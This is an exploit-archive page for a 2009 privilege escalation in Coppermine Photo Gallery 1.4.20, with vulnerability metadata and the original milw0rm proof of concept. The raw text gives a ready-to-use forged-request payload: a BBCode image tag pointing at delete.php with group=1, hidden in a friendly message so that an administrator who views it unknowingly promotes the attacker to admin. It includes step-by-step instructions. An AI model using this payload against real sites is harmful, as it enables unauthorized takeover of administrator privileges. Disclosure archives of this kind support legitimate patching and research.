Coppermine Photo Gallery - exploit.company

vendor:

Coppermine Photo Gallery

by:

Juri Gianni aka yeat

7.5

CVSS

HIGH

Privilege Escalation

CWE

Product Name: Coppermine Photo Gallery

Affected Version From: 1.4.20

Affected Version To: 1.4.20

Patch Exists: Yes

Related CWE: N/A

CPE: a:coppermine-gallery:coppermine_photo_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC

A vulnerability exists in Coppermine Photo Gallery version 1.4.20 and prior that allows an attacker to inject malicious code into a BBCode IMG tag. This can be used to escalate privileges when an administrator visits the page.

Mitigation:

Upgrade to the latest version of Coppermine Photo Gallery.

Source

Exploit-DB raw data:

+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it                       |
| http://coppermine-gallery.net                                            |
| Don't add me on msn messenger.                                           |
| This vulnerability can be named as "bbcode img tag script injection"     |
+--------------------------------------------------------------------------+
| Proof of Concept  (an example,to understand it)                          |
+--------------------------------------------------------------------------+
 URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
 [img]URL[/img]                                                           
+--------------------------------------------------------------------------+
| Modify [ID] with your user id.                                           |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id]     |
+--------------------------------------------------------------------------+
 Insert the below code into a new message
 
 hey admin,nice web site :)
 [img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]
 
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page             |          
+-------------------------------------------------------------------------+

# milw0rm.com [2009-02-26]